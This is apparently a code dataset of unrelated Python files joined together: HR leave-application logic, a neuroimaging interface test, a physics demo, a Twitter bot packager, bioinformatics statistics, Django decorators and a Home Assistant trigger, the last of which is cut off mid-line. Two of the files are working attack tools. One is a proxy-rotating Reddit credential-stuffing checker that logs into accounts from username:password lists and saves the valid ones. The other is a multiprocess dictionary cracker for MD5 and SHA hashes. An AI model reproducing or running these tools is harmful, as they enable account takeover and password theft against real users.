self.leave_approver): frappe.throw(_("{0} ({1}) must have role 'Leave Approver'")\ .format(get_fullname(self.leave_approver), self.leave_approver), InvalidLeaveApproverError) elif self.docstatus==1 and len(leave_approvers) and self.leave_approver != frappe.session.user: msgprint(_("Only the selected Leave Approver can submit this Leave Application"), raise_exception=LeaveApproverIdentityError) def notify_employee(self, status): employee = frappe.get_doc("Employee", self.employee) if not employee.user_id: return def _get_message(url=False): if url: name = get_url_to_form(self.doctype, self.name) else: name = self.name return (_("Leave Application") + ": %s - %s") % (name, _(status)) self.notify({ # for post in messages "message": _get_message(url=True), "message_to": employee.user_id, "subject": _get_message(), }) def notify_leave_approver(self): employee = frappe.get_doc("Employee", self.employee) def _get_message(url=False): name = self.name employee_name = cstr(employee.employee_name) if url: name = get_url_to_form(self.doctype, self.name) employee_name = get_url_to_form("Employee", self.employee, label=employee_name) return (_("New Leave Application") + ": %s - " + _("Employee") + ": %s") % (name, employee_name) self.notify({ # for post in messages "message": _get_message(url=True), "message_to": self.leave_approver, # for email "subject": _get_message() }) def notify(self, args): args = frappe._dict(args) from frappe.core.page.messages.messages import post post(**{"txt": args.message, "contact": args.message_to, "subject": args.subject, "notify": cint(self.follow_via_email)}) def get_holidays(leave_app): tot_hol = frappe.db.sql("""select count(*) from `tabHoliday` h1, `tabHoliday List` h2, `tabEmployee` e1 where e1.name = %s and h1.parent = h2.name and e1.holiday_list = h2.name and h1.holiday_date between %s and %s""", (leave_app.employee, leave_app.from_date, leave_app.to_date))[0][0] # below line is needed. If an employee hasn't been assigned with any holiday list then above will return 0 rows. if not tot_hol: tot_hol = frappe.db.sql("""select count(*) from `tabHoliday` h1, `tabHoliday List` h2 where h1.parent = h2.name and h1.holiday_date between %s and %s and ifnull(h2.is_default,0) = 1 and h2.fiscal_year = %s""", (leave_app.from_date, leave_app.to_date, leave_app.fiscal_year))[0][0] return tot_hol @frappe.whitelist() def get_total_leave_days(leave_app): # Parse Leave Application if neccessary if isinstance(leave_app, str) or isinstance(leave_app, unicode): leave_app = frappe.get_doc(json.loads(leave_app)) """Calculates total leave days based on input and holidays""" ret = {'total_leave_days' : 0.5} if not leave_app.half_day: tot_days = date_diff(leave_app.to_date, leave_app.from_date) + 1 holidays = leave_app.get_holidays() ret = { 'total_leave_days' : flt(tot_days)-flt(holidays) } return ret @frappe.whitelist() def get_leave_balance(employee, leave_type, fiscal_year): leave_all = frappe.db.sql("""select total_leaves_allocated from `tabLeave Allocation` where employee = %s and leave_type = %s and fiscal_year = %s and docstatus = 1""", (employee, leave_type, fiscal_year)) leave_all = leave_all and flt(leave_all[0][0]) or 0 leave_app = frappe.db.sql("""select SUM(total_leave_days) from `tabLeave Application` where employee = %s and leave_type = %s and fiscal_year = %s and status="Approved" and docstatus = 1""", (employee, leave_type, fiscal_year)) leave_app = leave_app and flt(leave_app[0][0]) or 0 ret = {'leave_balance': leave_all - leave_app} return ret def is_lwp(leave_type): lwp = frappe.db.sql("select is_lwp from `tabLeave Type` where name = %s", leave_type) return lwp and cint(lwp[0][0]) or 0 @frappe.whitelist() def get_events(start, end): events = [] employee = frappe.db.get_value("Employee", {"user_id": frappe.session.user}, ["name", "company"], as_dict=True) if not employee: return events employee, company = employee.name, employee.company from frappe.widgets.reportview import build_match_conditions match_conditions = build_match_conditions("Leave Application") # show department leaves for employee if "Employee" in frappe.get_roles(): add_department_leaves(events, start, end, employee, company) add_leaves(events, start, end, match_conditions) add_block_dates(events, start, end, employee, company) add_holidays(events, start, end, employee, company) return events def add_department_leaves(events, start, end, employee, company): department = frappe.db.get_value("Employee", employee, "department") if not department: return # department leaves department_employees = frappe.db.sql_list("""select name from tabEmployee where department=%s and company=%s""", (department, company)) match_conditions = "employee in (\"%s\")" % '", "'.join(department_employees) add_leaves(events, start, end, match_conditions=match_conditions) def add_leaves(events, start, end, match_conditions=None): query = """select name, from_date, to_date, employee_name, half_day, status, employee, docstatus from `tabLeave Application` where (from_date between %s and %s or to_date between %s and %s) and docstatus < 2 and status!="Rejected" """ if match_conditions: query += " and " + match_conditions for d in frappe.db.sql(query, (start, end, start, end), as_dict=True): e = { "name": d.name, "doctype": "Leave Application", "from_date": d.from_date, "to_date": d.to_date, "status": d.status, "title": cstr(d.employee_name) + \ (d.half_day and _(" (Half Day)") or ""), "docstatus": d.docstatus } if e not in events: events.append(e) def add_block_dates(events, start, end, employee, company): # block days from erpnext.hr.doctype.leave_block_list.leave_block_list import get_applicable_block_dates cnt = 0 block_dates = get_applicable_block_dates(start, end, employee, company, all_lists=True) for block_date in block_dates: events.append({ "doctype": "Leave Block List Date", "from_date": block_date.block_date, "title": _("Leave Blocked") + ": " + block_date.reason, "name": "_" + str(cnt), }) cnt+=1 def add_holidays(events, start, end, employee, company): applicable_holiday_list = frappe.db.get_value("Employee", employee, "holiday_list") if not applicable_holiday_list: return for holiday in frappe.db.sql("""select name, holiday_date, description from `tabHoliday` where parent=%s and holiday_date between %s and %s""", (applicable_holiday_list, start, end), as_dict=True): events.append({ "doctype": "Holiday", "from_date": holiday.holiday_date, "title": _("Holiday") + ": " + cstr(holiday.description), "name": holiday.name })
0.026586
from nipype.testing import assert_equal from nipype.interfaces.fsl.model import FILMGLS, FILMGLSInputSpec def test_filmgls(): input_map = dict(args = dict(argstr='%s',), autocorr_estimate_only = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-ac',), autocorr_noestimate = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-noest',), brightness_threshold = dict(argstr='-epith %d',), design_file = dict(argstr='%s',), environ = dict(usedefault=True,), fit_armodel = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-ar',), full_data = dict(argstr='-v',), ignore_exception = dict(usedefault=True,), in_file = dict(mandatory=True,argstr='%s',), mask_size = dict(argstr='-ms %d',), multitaper_product = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-mt %d',), output_pwdata = dict(argstr='-output_pwdata',), output_type = dict(), results_dir = dict(usedefault=True,argstr='-rn %s',), smooth_autocorr = dict(argstr='-sa',), threshold = dict(argstr='%f',), tukey_window = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='-tukey %d',), use_pava = dict(argstr='-pava',), ) input_map2 = dict(args = dict(argstr='%s',), autocorr_estimate_only = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--ac',), autocorr_noestimate = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--noest',), brightness_threshold = dict(argstr='--epith=%d',), design_file = dict(argstr='--pd=%s',), environ = dict(usedefault=True,), fit_armodel = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--ar',), full_data = dict(argstr='-v',), ignore_exception = dict(usedefault=True,), in_file = dict(mandatory=True,argstr='--in=%s',), mask_size = dict(argstr='--ms=%d',), multitaper_product = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--mt=%d',), output_pwdata = dict(argstr='--outputPWdata',), output_type = dict(), results_dir = dict(argstr='--rn=%s',usedefault=True,), smooth_autocorr = dict(argstr='--sa',), terminal_output = dict(), threshold = dict(usedefault=True,argstr='--thr=%f',), tukey_window = dict(xor=['autocorr_estimate_only', 'fit_armodel', 'tukey_window', 'multitaper_product', 'use_pava', 'autocorr_noestimate'],argstr='--tukey=%d',), use_pava = dict(argstr='--pava',), ) instance = FILMGLS() if isinstance(instance.inputs, FILMGLSInputSpec): for key, metadata in input_map.items(): for metakey, value in metadata.items(): yield assert_equal, getattr(instance.inputs.traits()[key], metakey), value else: for key, metadata in input_map2.items(): for metakey, value in metadata.items(): yield assert_equal, getattr(instance.inputs.traits()[key], metakey), value
0.034524
#!/usr/bin/env python3 import pge, sys from pygame.locals import * print("starting tiny") # pge.batch () pge.interactive () t = pge.rgb (1.0/2.0, 2.0/3.0, 3.0/4.0) wood_light = pge.rgb (166.0/256.0, 124.0/256.0, 54.0/256.0) wood_dark = pge.rgb (76.0/256.0, 47.0/256.0, 0.0) red = pge.rgb (1.0, 0.0, 0.0) green = pge.rgb (0.0, 1.0, 0.0) blue = pge.rgb (0.0, 0.0, 1.0) blue_dark = pge.rgb (0.1, 0.1, 0.8) steel = pge.rgb (0.5, 0.5, 0.5) copper = pge.rgb (0.5, 0.3, 0.2) gold = pge.rgb (0.8, 0.6, 0.15) ball_size = 0.02 boarder = 0.01 white = pge.rgb (1.0, 1.0, 1.0) gap = 0.01 captured = None sides = [] yellow = pge.rgb (0.8, 0.6, 0.15) def myquit (e): print("goodbye") sys.exit (0) def key_pressed (e): if e.key == K_ESCAPE: myquit (e) def placeBoarders (thickness, color): print("placeBoarders") e1 = pge.box (0.0, 0.0, 1.0, thickness, color).fix () e2 = pge.box (0.0, 0.0, thickness, 1.0, color).fix () e3 = pge.box (1.0-thickness, 0.0, thickness, 1.0, color).fix () e4 = pge.box (0.0, 1.0-thickness, 1.0, thickness, color).fix () return e1, e2, e3, e4 def placeBall (kind, x, y, r): return pge.circle (x, y, r, kind) def main (): global gb, sb, sides placeBoarders (0.01, wood_dark) sb = placeBall (wood_light, 0.25, 0.85, 0.02).mass (0.1) gb = placeBall (steel, 0.4, 0.9, 0.01).mass (1.0) print("before run") pge.record () pge.draw_collision (True, False) pge.collision_colour (red) pge.gravity () pge.dump_world () pge.slow_down (6.0) # slows down real time by a factor of pge.register_handler (myquit, [QUIT]) pge.register_handler (key_pressed, [KEYDOWN]) pge.display_set_mode ([1000, 1000]) pge.run (10.0) pge.finish_record () print("before main()") main ()
0.029034
import aiohttp import asyncio import sys import random import time from aiohttp import ProxyConnector from aiohttp import ClientSession global valids global finished finished = [] valids = [] sys.argv = ['', 'test.txt', 'proxies.txt', 'out.txt'] async def login(username, password, karma, comment_karma, number, measure, last_number, last_measure, proxies): global finished while True: try: proxy = random.choice(proxies).strip().rstrip() #conn = ProxyConnector(proxy="http://{0}".format(proxy)) async with ClientSession() as session: async with session.post('https://www.reddit.com/api/login/{0}'.format(username), data={ 'op':'login-main', 'user':username, 'passwd':password, 'api_type':'json', } ) as login: resJSON = await login.json() if len(resJSON['json']['errors']) == 1: return False else: pass async with session.get('https://www.reddit.com/prefs/update/') as request: resp = await request.read() resp = resp.decode('utf-8') if '(verification pending;' in resp or 'Your account has been locked due to possible password compromise' in resp: return False else: pass async with session.get('https://www.reddit.com/account-activity') as request: resp = await request.read() resp = resp.decode('utf-8') if 'Create your own subreddit' in resp: canCreate = True else: canCreate = False finished.append('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}:{8}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure, canCreate)) print('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}:{8}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure, canCreate)) print('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}:{8}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure, canCreate), file=open(sys.argv[3], 'a')) return True #print('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure)) except Exception: continue async def scrape(url, session, username, password): global valids print(url) async with session.get(url) as resp: response = await resp.read() response = response.decode('utf-8') try: if '<span class="trophy-name">Verified Email</span>' in response: return False karma = response.split('<span class="karma">')[1].split('</span>')[0] comment_karma = response.split('<span class="karma comment-karma">')[1].split('</span>')[0] age = response.split('<span class="age">')[1].split('</span>')[0].split('>')[1].replace('</time', '') number, measure = age.split(' ') if measure != 'years': return False try: last_number, last_measure, ago = response.split('class="live-timestamp">')[1].split('</time>')[0].split(' ') if last_measure != 'years': return False except: last_number, last_measure = ['None', ''] valids.append([username, password, karma, comment_karma, number, measure, last_number, last_measure]) #print('{0}:{1}:{2}:{3}:{4}{5}:{6}{7}'.format(username, password, karma, comment_karma, number, measure, last_number, last_measure)) return True except: return False async def bound_scrape(url, session, sem, username, password): async with sem: await scrape(url, session, username, password) async def start(): global valids proxies = open(sys.argv[2], 'r').readlines() reddits = open(sys.argv[1], 'r').readlines() tasks = [] base_url = 'https://www.reddit.com/user/{0}' sem = asyncio.Semaphore(4096) async with ClientSession() as session: for account in reddits: if account.strip().rstrip() != '': pass else: continue if len(account.strip().rstrip().split(':')) > 2: continue username, password = account.strip().rstrip().split(':') task = asyncio.ensure_future(bound_scrape(base_url.format(username), session, sem, username, password)) tasks.append(task) responses = asyncio.gather(*tasks) await responses print('Down to {0} accounts.'.format(len(valids))) return tasks = [] for account in valids: task = asyncio.ensure_future(login(account[0], account[1], account[2], account[3], account[4], account[5], account[6], account[7], proxies)) tasks.append(task) responses = asyncio.gather(*tasks) await responses print('Down to {0} accounts && finished.'.format(len(finished))) print(finished) if __name__ == "__main__": loop = asyncio.get_event_loop() future = asyncio.ensure_future(start()) loop.run_until_complete(future)
0.02885
''' Tests SoledadClient/SQLCipher interaction ''' import pytest from twisted.internet.defer import gatherResults def load_up(client, amount, payload, defer=True): results = [client.create_doc({'content': payload}) for _ in xrange(amount)] if defer: return gatherResults(results) def build_test_sqlcipher_async_create(amount, size): @pytest.inlineCallbacks @pytest.mark.benchmark(group="test_sqlcipher_async_create") def test(soledad_client, txbenchmark_with_setup, payload): """ Create many documents of a given size concurrently. """ client = soledad_client() yield txbenchmark_with_setup( lambda: None, load_up, client, amount, payload(size)) return test def build_test_sqlcipher_create(amount, size): @pytest.mark.skip(reason="this test is lengthy and not a real use case") @pytest.mark.benchmark(group="test_sqlcipher_create") def test(soledad_client, monitored_benchmark, payload): """ Create many documents of a given size serially. """ client = soledad_client()._dbsyncer monitored_benchmark( load_up, client, amount, payload(size), defer=False) return test test_async_create_10_1000k = build_test_sqlcipher_async_create(10, 1000 * 1000) test_async_create_100_100k = build_test_sqlcipher_async_create(100, 100 * 1000) test_async_create_1000_10k = build_test_sqlcipher_async_create(1000, 10 * 1000) # synchronous test_create_10_1000k = build_test_sqlcipher_create(10, 1000 * 1000) test_create_100_100k = build_test_sqlcipher_create(100, 100 * 1000) test_create_1000_10k = build_test_sqlcipher_create(1000, 10 * 1000)
0
import sys from services.spawn import MobileTemplate from services.spawn import WeaponTemplate from resources.datatables import WeaponType from resources.datatables import Difficulty from resources.datatables import Options from java.util import Vector def addTemplate(core): mobileTemplate = MobileTemplate() mobileTemplate.setCreatureName('bearded_jax') mobileTemplate.setLevel(37) mobileTemplate.setDifficulty(Difficulty.NORMAL) mobileTemplate.setMinSpawnDistance(4) mobileTemplate.setMaxSpawnDistance(8) mobileTemplate.setDeathblow(False) mobileTemplate.setScale(1) mobileTemplate.setMeatType("Herbivore Meat") mobileTemplate.setMeatAmount(15) mobileTemplate.setHideType("Bristley Hide") mobileTemplate.setHideAmount(15) mobileTemplate.setBoneType("Animal Bones") mobileTemplate.setBoneAmount(10) mobileTemplate.setSocialGroup("jax") mobileTemplate.setAssistRange(4) mobileTemplate.setStalker(False) mobileTemplate.setOptionsBitmask(Options.ATTACKABLE) templates = Vector() templates.add('object/mobile/shared_bearded_jax.iff') mobileTemplate.setTemplates(templates) weaponTemplates = Vector() weapontemplate = WeaponTemplate('object/weapon/melee/unarmed/shared_unarmed_default.iff', WeaponType.UNARMED, 1.0, 6, 'kinetic') weaponTemplates.add(weapontemplate) mobileTemplate.setWeaponTemplateVector(weaponTemplates) attacks = Vector() attacks.add('bm_claw_3') attacks.add('bm_flank_1') attacks.add('bm_slash_3') mobileTemplate.setDefaultAttack('creatureMeleeAttack') mobileTemplate.setAttacks(attacks) core.spawnService.addMobileTemplate('bearded_jax', mobileTemplate) return
0.026914
import sys import os ######################################## #Check Input Error ######################################## if len(sys.argv) != 5: print "Input Error!" print "Usage:" print "xx.py <Build mode: Homogeneous 0 / Heterogeneous 1> <Application Name> <Number of Groups> <Number of Slaves per Group>" quit() mode = int(sys.argv[1]) appName = sys.argv[2] numGroup = int(sys.argv[3]) numSlave = int(sys.argv[4]) currDict = os.getcwd()+"/" currDict = currDict[10:len(currDict)] currDict = currDict[0]+":"+currDict[1:len(currDict)] if mode == 0: cmd = "data2mem.bat -bm " + currDict + appName + "/system_wrapper_hw_platform_0/system_wrapper_bd.bmm " cmd = cmd + "-bt " + currDict + appName + "/system_wrapper_hw_platform_0/system_wrapper.bit " #Host cmd = cmd + "-bd " + currDict + appName + "/Host/Debug/Host.elf " cmd = cmd + "tag system_i_Host " #Slaves for i in range(0,numGroup): for j in range(0,numSlave): each = "Slave" processor = "Slave"+str(j)+"_Group"+str(i) cmd = cmd + "-bd " + currDict + appName + "/" + each + "/Debug/" + each + ".elf " cmd = cmd + "tag system_i_" + processor + " " cmd = cmd + "-o b " + currDict + appName + "/system_wrapper_hw_platform_0/download.bit" os.system(cmd) tclArg = currDict+appName cmd = "vivado -mode batch -source ./program.tcl -tclargs " + tclArg os.system(cmd) quit() ########################################## #Create download.bit ########################################## cmd = "data2mem.bat -bm " + currDict + appName + "/system_wrapper_hw_platform_0/system_wrapper_bd.bmm " cmd = cmd + "-bt " + currDict + appName + "/system_wrapper_hw_platform_0/system_wrapper.bit " #Host cmd = cmd + "-bd " + currDict + appName + "/Host/Debug/Host.elf " cmd = cmd + "tag system_i_Host " #Salves for i in range(0,numGroup): for j in range(0,numSlave): each = "Slave"+str(j)+"_Group"+str(i) cmd = cmd + "-bd " + currDict + appName + "/" + each + "/Debug/" + each + ".elf " cmd = cmd + "tag system_i_" + each + " " cmd = cmd + "-o b " + currDict + appName + "/system_wrapper_hw_platform_0/download.bit" os.system(cmd) tclArg = currDict+appName cmd = "vivado -mode batch -source ./program.tcl -tclargs " + tclArg os.system(cmd)
0.025088
# -*- coding:utf-8 -*- import zipfile import os.path import os import shutil class MakeBot: def __init__(self, auth): self.auth=auth self.dirname='' def makeZip(self, tweetFilePath): # tweetFilePath like .../tmp/RANDOM/tweetFile abspath f = open(tweetFilePath, "r") tweetsList = [] for line in f: tweetsList.append("'"+line[:-1]+"'") tweets = ",".join(tweetsList) f.close() code = """ import tweepy import random CONSUMER_KEY='{consumerKey}' CONSUMER_SECRET='{consumerSecret}' ACCESS_TOKEN='{accessToken}' ACCESS_TOKEN_SECRET='{accessTokenSecret}' tweets = [{tweets}] auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET) auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET) api = tweepy.API(auth) def tweet(): rand = random.randint(0,len(tweets)-1) tweet = tweets[rand] api.update_status(status=tweet) """.format(consumerKey=self.auth.consumer_key.decode('utf-8'), consumerSecret=self.auth.consumer_secret.decode('utf-8'), accessToken=self.auth.access_token, accessTokenSecret=self.auth.access_token_secret, tweets=tweets) dirname = os.path.dirname(tweetFilePath) self.dirname=dirname # dirname like .../tmp/RANDOM shutil.copytree('templates', dirname+'/bot') f = open(dirname+'/bot/bot.py', "w") f.write(code) f.close() zip = zipfile.ZipFile(dirname+"/"+os.path.basename(dirname)+".zip", "w", zipfile.ZIP_DEFLATED) files = os.listdir(dirname+'/bot') for f in files: zip.write(dirname+'/bot/'+f, 'bot/'+f) zip.close() def deleteFiles(self): os.rmdir(self.dirname) def getDirPath(self): return self.dirname
0.025253
#!/usr/bin/python # dpc-hashcrack.py v1.0 # offline cracking tools for md5,sha1,sha224,sha256,sha384,sha512 using # Crochemore-Perrin algorithm /w multiprocessing module. List dictionary will # be divided of 2 parts. reading string list from top to bottom and bottom # to top until the middle position of the number of strings, to increase # the probability and effectiveness discover of the password # # c0der: ch3cksum <ch3cksum@depredac0de.net> # special thx to: 5ynL0rd,xco,Dr_EIP,gat3w4y,pyfla,acayz,B4dJoe,blackend, # g4pt3k,qrembiezs,boys_rvn1609,Unixc0de # special thx community: darkc0de & antijasakom # # depredac0de.net <underground network security research group> #****************************************************************************************** import multiprocessing,hashlib,sys,os def md5(hash): climax = hashlib.md5(hash).hexdigest() return climax def sha1(hash): climax = hashlib.sha1(hash).hexdigest() return climax def sha224(hash): climax = hashlib.sha224(hash).hexdigest() return climax def sha256(hash): climax = hashlib.sha256(hash).hexdigest() return climax def sha384(hash): climax = hashlib.sha384(hash).hexdigest() return climax def sha512(hash): climax = hashlib.sha512(hash).hexdigest() return climax def getbigdick(penis): try: pussy = open(penis,'r') licker = pussy.readlines() c1 = 0 while c1 < len(licker): licker[c1] = licker[c1].strip() c1 += 1 except IOError: print "[-] Your file cannot be suck!" %penis exit() else: cek = len(licker) print "[+] %s word loaded" %cek return licker def toptobottom(crack): i = 0 while i < (len(asshole)/2): if len(crack) == 32: if crack == md5(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 40: if crack == sha1(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 56: if crack == sha224(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 64: if crack == sha256(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 96: if crack == sha384(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break elif len(crack) == 128: if crack == sha512(asshole[i]): print "\n\t[p1] 3===D passwd is = %s\n"%asshole[i] break else: print "[-] not support hash" sys.exit() i += 1 def bottomtotop(crack): k = 0 big = len(asshole) - len(asshole)/2 while k < (big): if len(crack) == 32: if crack == md5(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 40: if crack == sha1(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 56: if crack == sha224(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 64: if crack == sha256(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 96: if crack == sha384(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break elif len(crack) == 128: if crack == sha512(asshole[-k]): print "\n\t[p2] 3===D passwd is = %s\n"%asshole[-k] break else: sys.exit() k += 1 def banner(): header = ''' _______________________________________________________________________ dpc-hashcrack.py v1.0 "Take di*k out 3===D x" .-. (/^\) (\ /) .-'-. /(_I_)\ \\\\) (// / v \ \ | / \|/ /|\ \|/ /Y\\ c0der: ch3cksum <ch3cksum@depredac0de.net> special thx to: 5ynL0rd,xco,Dr_EIP,gat3w4y,pyfla,acayz,B4dJoe,blackend, g4pt3k,qrembiezs,boys_rvn1609,Unixc0de ________________________________________________________________________''' print header if __name__=="__main__": if os.name == "posix": refresh = "clear" else: refresh = "cls" os.system(refresh) banner() fuckit = raw_input("[+] Enter the Fuckin hash: ") dick = raw_input("[+] Enter dick file: ") asshole = getbigdick(dick) p1 = multiprocessing.Process(target=toptobottom, args=[fuckit]) p2 = multiprocessing.Process(target=bottomtotop, args=[fuckit]) p1.start() p2.start() while 1: if p1.is_alive()==False: p2.terminate() print "\n" break if p2.is_alive()==False: p1.terminate() print "\n" break
0.05545
# -*- coding: utf-8 -*- #imports the NCBI_utils lib containing the functions for GI accession and BLAST import MG_synth_lib as MGlib #random number generation import random #mean and std from numpy import mean from numpy import std #normal dist from scipy.stats import norm #system calls import sys #set default parameters motif_filename="CsoR.txt" #input file out_filename="_o" #o prefix for output verbose=0 #verbose mode alpha=1.0/300.0 #mixing ratio for regulated model rproms=3.0 #number of regulated promoters [prior] tproms=1811.0 #total number of promoters in genome [prior] experiment=2 #the experiment number out_filename=motif_filename.split(".")[0] + out_filename + str(experiment) #verbose if verbose: print "Using: ", motif_filename, " as input" if verbose: print "Writing to (suffix): ", "[void]" if out_filename==""\ else out_filename #open files for ouput try: out_file = open(out_filename + ".csv","w") except (IOError, OSError) as file_open_exception: print "*** Something went wrong while opening the output file" print "*** Error: ", file_open_exception.errno, " - ",\ file_open_exception.strerror sys.exit() #compute priors PR=rproms/tproms #prior probability of regulation PB=1.0-PR #prior probability of non-regulation PPR=PB/PR #prior probability ratio #read motif and assing 0.25 pseudocounts to PSWM #also assign background uniform distribution for the PSSM (default) mot = MGlib.read_motif(motif_filename) mot.pseudocounts=1 mot.background=None #save the pssm for the motif and the reverse complement #(so that they are not recalculated everytime we invoke motif.pssm) pssm = mot.pssm rpssm = pssm.reverse_complement() #------------------------------------------------------------------------- #Experiment 2: #Using 100 sequences, with 12 sites inserted #get normalizazed probability #do this for 2, 3, 4, 5, 6 and 8 stdevs below mean #repeat 1000 times random.seed(None) verbose=1 #write csv header out_file.write('Theta,Ins_sites,Post,Pass_filt_seqs,Def_post\n') #loop experiments for cnt in range(0,1000): print "Experiment: ", cnt #in each experiment, create dataset with 100 seqs, sz with sites inserted for cnt2 in range(0,1): #create background sequence set: 100 seqs 283 bp long set1 = MGlib.random_DNA(283,{'A': 0.3,'C': 0.2,'G': 0.2,'T': 0.3},100) #compute softmax scores for background sequences in dataset gscr = MGlib.esfmax_score_seqs(set1,pssm,rpssm) #compute softmax scores for motif sequences mscr = MGlib.esfmax_score_seqs(mot.instances,pssm,rpssm) #get normal distributions for background and motif n_g=norm(mean(gscr), std(gscr)) n_m=norm(mean(mscr), std(mscr)) #create motif instances pmot1 = MGlib.sample_motif(mot,250) #determine dataset size if (cnt2==0): sz=12 #insert sites in sequences e=0 while (e<len(set1)): #insert random site in first 10 sequences if (e<sz+1): set1[e] = random.choice(pmot1) + set1[e] #otherwise insert random sequence from own sequence start else : set1[e] = set1[e][:17] + set1[e] e = e+1 #compute softmax scores for sequences in dataset scrs1=MGlib.esfmax_score_seqs(set1,pssm,rpssm) #perform calculations for each theta value for cnt3 in range(0,6): if (cnt3==0): theta=-8 elif (cnt3==1): theta=-6 elif (cnt3==2): theta=-5 elif (cnt3==3): theta=-4 elif (cnt3==4): theta=-3 else: theta=-2 #NORMALIZATION #compute effective cutoff (th) value given theta th = MGlib.ThetaTh(theta,n_m) if verbose: print "Effective cut-off: ", th #compute revised priors (assuming 300 bp average length) aPR, aPB = MGlib.NormPriors(th, n_g, n_m, alpha, rproms,\ tproms, promlen=300.0) #get revised prior ratio aPPR = aPB/aPR #FILTER sequences not matching theta #get list of sequences with min score > th Nscrs1 = [x for x in scrs1 if max(x)>=th] if verbose: print "Length of post-theta bckg seqs: ", len(Nscrs1) #get log-likelihoods for sequences in dataset Nllrs1=MGlib.ll_ratios(Nscrs1,n_g,n_m,alpha) #get normalization factors Nnormfs1=MGlib.lNormFactor(Nscrs1, th, n_g, n_m, alpha) #get overall normalized posterior for the sequences in dataset Nposts1=MGlib.NormPostP(Nllrs1,aPPR,Nnormfs1,0) if verbose: print theta, " - ", sz, " - ", Nposts1, " - ", \ len(Nscrs1), 1/(1+aPPR) #write results to file out_file.write(str(theta)) out_file.write(',') out_file.write(str(sz)) out_file.write(',') out_file.write(str(Nposts1)) out_file.write(',') out_file.write(str(len(Nscrs1))) out_file.write(',') out_file.write(str(1/(1+aPPR))) out_file.write('\n') out_file.close()
0.025605
import urlparse from functools import wraps from django.conf import settings from django.contrib import messages from django.shortcuts import render from django.contrib.auth import REDIRECT_FIELD_NAME from django.core.exceptions import PermissionDenied from django.utils.translation import ugettext_lazy as _ from django.contrib.auth.views import redirect_to_login def staff_member_required(view_func, login_url=None): """ Ensure that the user is a logged-in staff member. * If not authenticated, redirect to a specified login URL. * If not staff, show a 403 page This decorator is based on the decorator with the same name from django.contrib.admin.view.decorators. This one is superior as it allows a redirect URL to be specified. """ if login_url is None: login_url = getattr(settings, 'LOGIN_URL') @wraps(view_func) def _checklogin(request, *args, **kwargs): if request.user.is_active and request.user.is_staff: return view_func(request, *args, **kwargs) # If user is not logged in, redirect to login page if not request.user.is_authenticated(): # If the login url is the same scheme and net location then just # use the path as the "next" url. path = request.build_absolute_uri() login_scheme, login_netloc = urlparse.urlparse(login_url)[:2] current_scheme, current_netloc = urlparse.urlparse(path)[:2] if ((not login_scheme or login_scheme == current_scheme) and (not login_netloc or login_netloc == current_netloc)): path = request.get_full_path() messages.warning(request, _("You must log in to access this page")) return redirect_to_login(path, login_url, REDIRECT_FIELD_NAME) else: # User does not have permission to view this page raise PermissionDenied return _checklogin def login_forbidden(view_func, template_name='login_forbidden.html', status=403): """ Only allow anonymous users to access this view. """ @wraps(view_func) def _checklogin(request, *args, **kwargs): if not request.user.is_authenticated(): return view_func(request, *args, **kwargs) return render(request, template_name, status=status) return _checklogin
0
""" Offer template automation rules. For more details about this automation rule, please refer to the documentation at https://home-assistant.io/components/automation/#template-trigger """ import logging import voluptuous as vol from homeassistant.core import callback from homeassistant.const import CONF_VALUE_TEMPLATE, CONF_PLATFORM from homeassistant.helpers import condition from homeassistant.helpers.event import async_track_state_change import homeassistant.helpers.config_validation as cv _LOGGER = logging.getLogger(__name__) TRIGGER_SCHEMA = IF_ACTION_SCHEMA = vol.Schema({ vol.Required(CONF_PLATFORM): 'template', vol.Required(CONF_VALUE_TEMPLATE): cv.template, }) def async_trigger(hass, config, action): """Listen for state changes based on configuration.""" value_template = config.get(CONF_VALUE_TEMPLATE) value_template.hass = hass # Local variable to keep track of if the action has already been triggered already_triggered = False @callback def state_changed_listener(entity_id, from_s, to_s): """Listen for state changes and calls action.""" nonlocal already_triggered template_result = condition.async_template(hass, value_template) # Check to see if template returns true if template_result and not already_triggered: already_triggered 